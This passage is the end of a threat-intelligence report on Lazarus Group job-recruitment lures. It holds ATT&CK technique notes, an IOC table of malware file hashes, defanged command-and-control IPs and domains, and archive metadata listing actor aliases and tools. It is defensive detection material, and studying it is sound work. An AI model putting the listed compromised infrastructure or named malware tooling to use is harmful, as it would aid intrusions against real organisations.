Shares\r\nThe Lazarus Group uses compromised legitimate privileged\r\naccounts to move laterally on the network\r\nCommand And Control\r\nT1132.002\r\nData Encoding: Non-Standard\r\nEncoding\r\nThe Lazarus Group uses its own data encryption algorithm to\r\ncommunicate with the C2\r\nT1071.001\r\nApplication Layer Protocol: Web\r\nProtocols\r\nThe Lazarus Group's malware uses the standard HTTP protocol to\r\nconnect to the C2\r\n11. IOCs\r\nFile name MD5 SHA-1 SHA-256\r\nAccountStore.bak 665ce00318552c6ddc22e2f5e59cd516 71e5bb0e7f00bb11518e8d7f619f2b6c9fa09eaf 7e454b22987d8901a\r\nAccountStore.bak 107953faf48823913b19ab7cf311a2c8 73a2aed35aa5fc8621828e11c76d58144ea7f6bb ceec993673d95fd0af\r\nAccountStore.bak bc1e06ba5f472aaf30d8027dc8562307  04bc9e74c65b6df6f6c4ba90db3d85ca9b2dda4c 79076febac7abad26a\r\nAccountStore.bak 66037fc3c489d099107e2d3cddd33569 a7e34ed64337893752eadfbfae9a516c8b482329 c1d6a5940045b7ff00\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 19 of 20\n\nFile name MD5 SHA-1 SHA-256\r\nApplicationCacher-f0182c1a4.rbs\r\n5f77737c1f4bd8b1868dc50efce1bbf5 c85c825f1e2ef66d83dc1cf011f8b2e6aee08fa8 93d78712eb3f9e812\r\nCacher.hls-iol 12011c44955fd6631113f68a99447515 4f4f8cf0f9b47d0ad95d159201fe7e72fbc8448d c92c158d7c37fea795\r\nCommsCacher.bin 74c71671764610245a392f7e7444694c d28318b4ab7a9076eed8f20306ddf68731ed2357 7e37d83efd01785ace\r\nCommsCacher.dat 8ec9ff02b58559c851b59189a9d57124 9952c3fa4bce7ef68f8f6a50a593c8ead2481488 56f5252ea7b10a8a2e\r\nCommsCacher.dat 3af010659d19b69d8fbc9b9bb917f603 4b404db4dbdf9240926fc9f3225e4cdd3a9f443c d6b7cdd046f0c185e9\r\nCommsMangement.tls - - 02546fae0355905d3\r\ncommspkg.bin a63d7e501a17c8917ef96d4b31fa100b  6e8728af6cc4a7daa06e4ced52a8f45ec6229fd8  0dba9eaac49d78c69\r\nGD2020090939393903.doc 415cd5c206baf793708952777ae0c987 6db80e381260eab8c93ee51bed40b1d5c38601bb 7d235c717a031fc794\r\nGD2020090939393903.doc 6e815cacb43c9bc055399a4fd4922ebc fe1894d343484cb3dc7ec16bef8252bd64cb7b6e 1174fd03271f80f5e2\r\nGD20200909GAB31.doc 2e83293e8da65d54253ca3b5bd87c414 188415339edc3b54f6627f57bc77d4d500a670a3 bc54765b4790b5a0a\r\nGD20200909GAB31.doc b2b8a0f74500bc0a93a7e54b06de5020 b42b60fc26bce51269ba6641fdf406a3491e6c6d 385b758ae75075b54\r\nGDLS_2020090392828334.doc 8ed89d14dee005ea59634aade15dba97 ea93acf0c278dd59e29ae1402d35db8e0f3ae966 9c906c2f3bfb24883a\r\nGDLS202009069871.doc 058542975392c9636371b88a3f6142d7 e8cdac8acff9a39d016095c165b7c366e93adec5 75bf8feeac2b5b1690\r\nGDLS202009069871.pdf e5ff537666b387c39a406cbbb359b2ed 4610a559b21b7e5e62925c115863e82ffa0b8977 e13888eed2466efaae\r\nGDLS47129481.docx 994c02f8c721254a959ed9bc823ab94b 610960413c81cf391a8f28fb83b2482f446953ca 17f1c3dc3ad9e0e87e\r\nInternalPDFViewer.exe - - 2aa3fd1c4b1036efc7\r\nMemoryCacher.dat bc731ade86b380e87eb6188b7f2b4255 3ccec13409045f9a6903a3bee1db474c75f959fe c3a6e07ab16c8c887\r\nMSSqlite3.lnk 2a0da707ab46c53d9af2f059c3150c62 e7526de25b1f759c7a7bbe61095cfebbae7c158d e8ae38308c499577a\r\nMSSqlite3Svc.lnk ea9ff940a65e650ef2090148b0e67853 1d24d431daf8566a84432a149989c43f57c4a5ef fcaead308afb9cc4fb3\r\nregid.mdb 963e8cfaa40226ba2e5d516464572446 fc64890ac49970cccdc80826d40e50f50b5d5b6f 7434c5de43c561780\r\nregid.mdb 277962f69a26cc7ac55e9dceb83af9d1 e9e691f11cfecb706c29f729ae660240ee9acbcb cca1ee1d92f7dac860\r\nusomsqlite3.lgs.dat c2c399e9e78dbe447c3971014881ca05 c5abf0f2903b0549c20a8f964af7c4d24e730d9a e924b7c21b298ab18\r\nvolitile.dat - - 30cc1612fa94be4e02\r\nIP Domain Country Organization\r\n182.48.49[.]233 goldllama4.sakura[.]ne.jp JP AS9371 SAKURA Internet Inc.\r\n150.60.192[.]67 propro[.]jp JP AS9597 KDDI Web Communications Inc.\r\n54.64.30[.]175 vega.mh-tec[.]jp JP AS16509 Amazon.com\r\n164.46.106[.]43 hospitality-partners[.]co.jp JP AS4694 IDC Frontier Inc.\r\n118.128.190[.]191 apars-surgery[.]org KR AS3786 LG DACOM Corporation\r\n160.153.142[.]0 akramportal[.]org NL AS21501 Host Europe GmbH\r\n198.133.183[.]67 bootcamp-coders.cnm[.]edu US AS4869 Central New Mexico Community College\r\n166.62.39[.]82 clicktocareers[.]com  US AS26496 GoDaddy.com\r\n23.152.0[.]232 forecareer[.]com US AS8100 QuadraNet Enterprises LLC\r\n162.241.219[.]119 gbflatinamerica[.]com US AS46606 Unified Layer\r\n92.249.45[.]182 inovecommerce[.]com.br US AS47583 Hostinger International Limited\r\nSource: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/" ], "report_names": [ "lazarus-recruitment" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434264, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2af2d8cb54bdb9d6befda3b634d5c15da281d6c5.pdf", "text": "https://archive.orkl.eu/2af2d8cb54bdb9d6befda3b634d5c15da281d6c5.txt", "img": "https://archive.orkl.eu/2af2d8cb54bdb9d6befda3b634d5c15da281d6c5.jpg" } }